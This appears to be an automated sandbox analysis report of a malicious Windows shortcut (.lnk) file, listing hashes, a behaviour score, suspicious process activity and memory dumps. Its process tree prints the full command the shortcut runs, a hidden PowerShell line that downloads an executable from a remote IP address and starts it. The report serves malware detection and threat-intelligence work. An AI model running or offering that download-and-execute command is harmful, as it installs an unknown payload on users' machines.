d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d

Analysis

max time kernel
117s
max time network
120s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
06-12-2023 01:09

Target

d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
Size

1KB
MD5

92cff55b70b6556b395300de968521fc
SHA1

4bfccd1a6dc2a775a497074caecf25386dab49fb
SHA256

d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d
SHA512

7b59f385a7bacba7a87479837218f1399894480f2b4ae60811d0c4ec180cfbfde6170ecb0b369f4dd0cd75af02a216b5659e714d7c53d439394664505a9311fe

Score

5^/10

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2668 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2668 powershell.exe

pid	process
2668	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2668	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2696 wrote to memory of 2724	2696	cmd.exe	cmd.exe
PID 2696 wrote to memory of 2724	2696	cmd.exe	cmd.exe
PID 2696 wrote to memory of 2724	2696	cmd.exe	cmd.exe
PID 2724 wrote to memory of 2668	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2668	2724	cmd.exe	powershell.exe
PID 2724 wrote to memory of 2668	2724	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\d3ab1b047a1ee9985c00c95cd4d205f79bdf47ade1f18ee30ec9d88a58cb133d.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -windowstyle hidden -command "& {Invoke-WebRequest -Uri 'http://185.196.9.20/test/sleeps.exe' -OutFile $env:APPDATA\newfile.exe; Start-Process $env:APPDATA\newfile.exe}"
2⤵
- Suspicious use of WriteProcessMemory
PID:2724

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2668-40-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

Filesize
2.9MB

Download
memory/2668-41-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download
memory/2668-42-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-43-0x0000000002A20000-0x0000000002AA0000-memory.dmp

Filesize
512KB

Download
memory/2668-44-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-45-0x0000000002A20000-0x0000000002AA0000-memory.dmp

Filesize
512KB

Download
memory/2668-46-0x0000000002A20000-0x0000000002AA0000-memory.dmp

Filesize
512KB

Download
memory/2668-47-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

Filesize
9.6MB

Download